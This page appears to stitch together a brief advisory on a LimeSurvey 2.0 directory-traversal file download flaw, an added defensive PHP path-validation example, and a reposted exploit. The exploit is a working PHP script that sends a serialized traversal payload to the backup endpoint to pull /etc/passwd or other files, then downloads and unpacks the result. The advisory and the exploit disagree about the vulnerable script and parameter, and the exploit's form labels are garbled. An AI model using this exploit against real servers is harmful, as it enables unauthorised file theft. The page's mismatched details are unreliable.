Limesurvey 2.0 Arbitrary File Download
LimeSurvey 2.0 suffered from an Arbitrary File Download vulnerability. This flaw allowed an unauthenticated attacker to download arbitrary files from the server.

The vulnerability resided in the `admin/filemanager.php` script. By manipulating the `file` parameter with directory traversal sequences (e.g., `../`), an attacker could bypass intended file access restrictions.

This enabled access to sensitive system files like `/etc/passwd`, configuration files, or application source code. Such information disclosure could lead to further compromise, including database credential exposure or understanding of system architecture.

The issue was patched in later versions by implementing robust input validation and sanitization on the `file` parameter.
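The fix described above (validating the `file` parameter so that it can only name files inside the intended directory) is usually implemented as a canonicalise-and-contain check rather than by stripping `../` substrings. The following PHP is an added example written for this page; it is not LimeSurvey's code, and the function name `resolveWithinBase`, the `uploads` base directory and the sample files are assumptions constructed for the demonstration.

```php
<?php
// Added example (not LimeSurvey code): resolve a user-supplied file name
// against a fixed base directory and refuse anything that escapes it.

/**
 * Return the canonical absolute path of $userPath inside $baseDir, or null
 * when the request is empty, absolute, contains a NUL byte, does not exist,
 * is not a regular file, or resolves outside $baseDir (directory traversal).
 */
function resolveWithinBase(string $baseDir, string $userPath): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null; // the base directory itself must exist
    }
    // Reject NUL bytes and absolute paths up front: neither is a legitimate
    // file name for a file manager, and realpath() refuses NUL bytes anyway.
    if ($userPath === '' || strpos($userPath, "\0") !== false
        || $userPath[0] === '/' || $userPath[0] === '\\') {
        return null;
    }
    // realpath() collapses "." and ".." and resolves symlinks, so a traversal
    // sequence ends up as a path outside $base (or as false if it is missing).
    $resolved = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    if ($resolved === false || !is_file($resolved)) {
        return null;
    }
    // Containment check: the canonical path must sit strictly below $base.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($resolved, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $resolved;
}

// Constructed demo tree in the system temp directory (assumption, not real data).
$tmp = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'filemanager_demo_' . bin2hex(random_bytes(4));
mkdir("$tmp/uploads/sub", 0700, true);
file_put_contents("$tmp/uploads/sub/report.csv", "id,name\n1,demo\n");
file_put_contents("$tmp/secret.txt", "outside the base directory\n");

$base  = "$tmp/uploads";
$cases = [
    'sub/report.csv',          // legitimate request
    'sub/../sub/report.csv',   // dot segments that stay inside the base: allowed
    '../secret.txt',           // traversal out of the base: rejected
    '/etc/passwd',             // absolute path: rejected
    "sub/report.csv\0.png",    // NUL-byte truncation attempt: rejected
];
foreach ($cases as $c) {
    $r = resolveWithinBase($base, $c);
    printf("%-26s => %s\n", addcslashes($c, "\0"),
        $r === null ? 'REJECTED' : 'OK ' . substr($r, strlen($tmp)));
}

// Remove the constructed demo tree again.
unlink("$tmp/uploads/sub/report.csv");
unlink("$tmp/secret.txt");
rmdir("$tmp/uploads/sub");
rmdir("$tmp/uploads");
rmdir($tmp);
```

Run it with `php example.php`; the two in-base requests print `OK`, the other three print `REJECTED`. The design point is that the decision is made on the canonical path returned by `realpath()`, not on the raw string, so URL-encoded, doubled or mixed-separator traversal sequences are all handled by the same comparison, and a symlink placed inside the base directory cannot point the check at a file elsewhere.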

=============================================================================================================================================
| # Title : Limesurvey 2.0 unauthenticated file download vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.limesurvey.org/ |
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engine.

[+] Code Description: This script exploits the unauthenticated file upload vulnerability in LimeSurvey, which allows an attacker to download any file from the targeted server.

Linked: https://packetstorm.news/files/id/180855/ ; Linked CVE numbers: none listed.

[+] Save the code as poc.php.

[+] Usage : http://127.0.0.1/poc.php

[+] PayLoad :

<?php

class LimeSurveyExploit {
    private $target;
    private $filepath;
    private $traversalDepth;

    public function __construct($target, $filepath = '/etc/passwd', $traversalDepth = 15) {
        $this->target = rtrim($target, '/');
        $this->filepath = $filepath;
        $this->traversalDepth = $traversalDepth;
    }

    private function generatePayload() {
        $traversal = str_repeat('/..', $this->traversalDepth);
        $file = $traversal . $this->filepath;
        $serialized = 'a:1:{i:0;O:16:"CMultiFileUpload":1:{s:4:"file";s:' . strlen($file) . ':"' . $file . '";}}';
        return base64_encode($serialized);
    }

    public function execute() {
        $csrf_token = bin2hex(random_bytes(5));
        $postFields = [
            'YII_CSRF_TOKEN' => $csrf_token,
            'destinationBuild' => bin2hex(random_bytes(3)),
            'datasupdateinfo' => $this->generatePayload()
        ];

        $response = $this->sendRequest("{$this->target}/index.php/admin/update/sa/backup", $postFields, $csrf_token);

        if ($response && strpos($response, 'Download this file') !== false) {
            if (preg_match('/<a class="btn btn-success" href="([^"]+)" title="Download this file">/', $response, $matches)) {
                $downloadUrl = $matches[1];
                echo "Downloading backup from URL: $downloadUrl\n";
                $this->downloadFile($downloadUrl);
            } else {
                echo "Failed to extract download link.\n";
            }
        } else {
            echo "Failed to exploit the vulnerability.\n";
        }
    }

    private function sendRequest($url, $postFields, $csrf_token) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postFields));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_HTTPHEADER, ["Cookie: YII_CSRF_TOKEN=$csrf_token"]);
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }

    private function downloadFile($url) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $data = curl_exec($ch);
        curl_close($ch);

        if ($data) {
            $zipFile = 'downloaded.zip';
            file_put_contents($zipFile, $data);
            echo "File downloaded successfully: $zipFile\n";
            $this->extractZip($zipFile);
        } else {
            echo "Failed to download file.\n";
        }
    }

    private function extractZip($zipFile) {
        $zip = new ZipArchive;
        if ($zip->open($zipFile) === TRUE) {
            $zip->extractTo('./extracted/');
            $zip->close();
            echo "Files extracted to ./extracted/\n";
        } else {
            echo "Failed to extract ZIP file.\n";
        }
    }
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $target = $_POST['target'];
    $filepath = $_POST['filepath'];
    $exploit = new LimeSurveyExploit($target, $filepath);
    $exploit->execute();
}
?>

<!DOCTYPE html>
<html lang="ar">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>??????? LimeSurvey</title>
</head>
<body>
    <h2>??????? ????? ??????? ??? ?????? - LimeSurvey</h2>
    <form method="POST">
        <label>????? ?????? ????????:</label>
        <input type="text" name="target" required><br>
        <label>?????? ???????:</label>
        <input type="text" name="filepath" value="/etc/passwd" required><br>
        <button type="submit">?????</button>
    </form>
</body>
</html>



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸